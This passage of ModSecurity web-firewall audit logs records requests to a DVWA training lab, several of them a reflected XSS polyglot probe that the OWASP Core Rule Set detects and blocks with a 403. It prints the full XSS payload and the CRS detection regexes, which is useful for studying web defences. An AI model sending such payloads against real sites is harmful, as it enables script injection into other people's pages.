2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":580,"p2":3113,"p3":0,"p4":0,"p5":162,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:10 --0400","transaction_id":"WRc0Vn8AAQEAAAkVV4oAAAAA","remote_address":"127.0.0.1","remote_port":42048,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Wed, 10 May 2017 02:17:21 GMT","If-None-Match":"\"cca-54f22127f468d-gzip\"","Cache-Control":"max-age=0"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Wed, 10 May 2017 02:17:21 GMT","ETag":"\"cca-54f22127f468d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc0Vn8AAQEAAAkVV4oAAAAA\"]"],"stopwatch":{"p1":386,"p2":977,"p3":75,"p4":547,"p5":64,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:10 --0400","transaction_id":"WRc0Vn8AAQEAAAkVV4sAAAAA","remote_address":"127.0.0.1","remote_port":42048,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:26:00 GMT","If-None-Match":"\"1a8-54f6a470f3057\"","Cache-Control":"max-age=0"}},"response":{"protocol":"HTTP/1.1","status":304,"headers":{"Last-Modified":"Sat, 13 May 2017 16:26:00 GMT","ETag":"\"1a8-54f6a470f3057\"","Accept-Ranges":"bytes","Content-Length":"0","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc0Vn8AAQEAAAkVV4sAAAAA\"]"],"stopwatch":{"p1":608,"p2":1233,"p3":59,"p4":146,"p5":63,"sr":33,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:13 --0400","transaction_id":"WRc0lX8AAQEAAAmHBJYAAAAF","remote_address":"192.168.75.145","remote_port":56782,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver 